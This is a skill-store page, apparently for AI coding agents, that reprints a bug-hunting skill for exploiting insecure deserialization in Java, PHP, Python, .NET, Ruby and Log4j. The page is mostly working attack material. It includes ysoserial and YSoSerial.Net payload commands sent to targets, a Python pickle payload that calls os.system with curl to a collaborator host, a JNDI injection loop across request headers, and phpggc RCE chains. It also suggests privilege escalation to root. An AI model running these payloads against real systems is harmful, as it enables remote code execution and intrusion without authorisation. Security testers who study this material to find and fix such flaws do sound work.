‹ 首页

hunt-deserialization

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunt Insecure Deserialization — Java gadget chains (ysoserial), PHP object injection (phpggc), Python pickle RCE, .NET BinaryFormatter, Ruby Marshal.load, JNDI/Log4Shell. RCE via deserialization is almost always Critical. Use when target runs Java, PHP serialization, Python pickle, .NET, or Ruby on Rails.

适合你,如果需要在Java、PHP、Python等应用中挖掘反序列化漏洞

/ 下载安装
hunt-deserialization.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-deserialization
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-deserialization
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-deserialization
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~1.1K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会帮你检测和利用不安全的反序列化漏洞,包括 Java、PHP、Python、.NET、Ruby 和 Log4Shell 等场景,并生成对应的攻击载荷。

什么时候触发

当目标运行 Java、PHP 序列化、Python pickle、.NET 或 Ruby on Rails 时触发。

装好后可以这样说
Claude 会生成 pickle 载荷并发送请求。
Claude 会在多个请求头中注入 JNDI 探测字符串。
技能原文 SKILL.md作者撰写 · MIT · 05098fc

HUNT-DESERIALIZATION — Insecure Deserialization

Crown Jewel Targets

Deserialization bugs are almost always Critical — they lead directly to RCE without prerequisite conditions.

Highest-value chains:

  • Java ysoserial gadget chains — CommonsCollections, Spring, JNDI, Groovy gadgets → full OS command execution
  • PHP Object Injection__wakeup / __destruct magic methods → file write / RCE
  • Python picklepickle.loads(attacker_data)__reduce__os.system('id')
  • .NET BinaryFormatter — TypeConfuseDelegate gadget chain → RCE
  • Ruby Marshal.load — Gem::Requirement, Gem::Installer gadgets → RCE
  • JNDI injection — Log4Shell pattern: ${jndi:ldap://attacker/a} → class load → RCE

Attack Surface Signals
Detection Patterns
# Java serialized objects start with AC ED 00 05 (hex) or rO0A (base64)
echo "rO0ABXQ=" | base64 -d | xxd | head -1  # shows: ac ed 00 05

# PHP serialization: O:8:"stdClass":0:{}
# Python pickle: starts with \x80\x04 (protocol 4) or \x80\x02

# Apache Shiro: rememberMe cookie present
curl -sI https://$TARGET/ | grep -i "Set-Cookie.*rememberMe"

# Log4j: test user-controlled fields for JNDI interpolation
curl -H 'User-Agent: ${jndi:dns://COLLAB_HOST/a}' https://$TARGET/
Header / Cookie Signals
Content-Type: application/x-java-serialized-object
Cookie containing rO0= prefix (Java base64 serialized)
Cookie: rememberMe= (Apache Shiro)
Cookie: _VIEWSTATE (ASP.NET ViewState without encryption)
Endpoints: /remoting/, /invoker/, /jmx-console/, /wls-wsat/

Step-by-Step Hunting Methodology
Phase 1 — Java Deserialization (ysoserial)
# Install ysoserial
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar

# Generate OOB detection payload
java -jar ysoserial-all.jar CommonsCollections6 \
  'curl http://COLLAB_HOST/ysoserial' | base64 -w0

# Send as body or cookie
java -jar ysoserial-all.jar CommonsCollections6 'id > /tmp/pwned' | base64 | \
  curl -s https://$TARGET/wls-wsat/CoordinatorPortType \
    -H "Content-Type: application/x-java-serialized-object" \
    --data-binary @-

# Apache Shiro exploit (default AES key)
python3 shiro_exploit.py -u https://$TARGET/ -c "id"
Phase 2 — PHP Object Injection
# Find unserialize() calls in source
grep -r "unserialize(" --include="*.php" .

# Inject test: O:8:"stdClass":1:{s:4:"test";s:5:"value";}
# Send in cookie, POST param, or hidden form field
# If error changes → deserialization confirmed

# Craft gadget chain using phpggc
git clone https://github.com/ambionics/phpggc
php phpggc -l  # list chains
php phpggc Laravel/RCE5 system id | base64
Phase 3 — Python Pickle
# Generate OOB payload
python3 -c "
import pickle, os, base64
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('curl http://COLLAB_HOST/pickle-rce',))
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"

# Send as cookie or POST body
curl -s https://$TARGET/api/load-model \
  -H "Content-Type: application/octet-stream" \
  --data-binary @payload.pkl
Phase 4 — .NET ViewState
# Check if ViewState is unsigned (MAC disabled)
# Look for __VIEWSTATE in HTML source without __VIEWSTATEMAC

# YSoSerial.Net
dotnet YSoSerial.exe -f BinaryFormatter -g TypeConfuseDelegate \
  -c "cmd /c curl http://COLLAB_HOST/viewstate-rce" -o base64
Phase 5 — Log4Shell / JNDI
# Test all user-controlled inputs
COLLAB="COLLAB_HOST"
for HEADER in "User-Agent" "X-Forwarded-For" "Referer" "X-Api-Version" "Accept-Language"; do
  curl -s https://$TARGET/ -H "$HEADER: \${jndi:dns://$COLLAB/$HEADER}" &
done

# Test POST body fields
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d "{\"username\": \"\${jndi:ldap://$COLLAB/a}\"}"
Phase 6 — Ruby Marshal
# Look for Marshal.load in source
grep -r "Marshal.load\|Marshal.restore" --include="*.rb" .

# Gem::Requirement gadget chain via marshalable objects
# Use ruby-advisory-db gadgets

Chain Table

| Deserialization signal | Chain to | Impact | |-----------------------|----------|--------| | Any deser RCE | /etc/passwd + id output | Prove arbitrary command execution | | RCE as low-privilege user | Find SUID binaries / sudo rules | Privilege escalation → root | | Blind RCE (OOB callback) | DNS callback → confirm exec | Sufficient for Critical PoC | | Log4Shell | LDAP → JNDI → class load | Full RCE on JVM process |


Automation
# OOB listener
interactsh-client -v -n 5

# JNDI exploit kit
git clone https://github.com/pimps/JNDI-Exploit-Kit

Validation

✅ DNS/HTTP callback from COLLAB host: blind deserialization confirmed ✅ Command output in response: full RCE confirmed

Severity: Almost always Critical — RCE with server process privileges.

按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。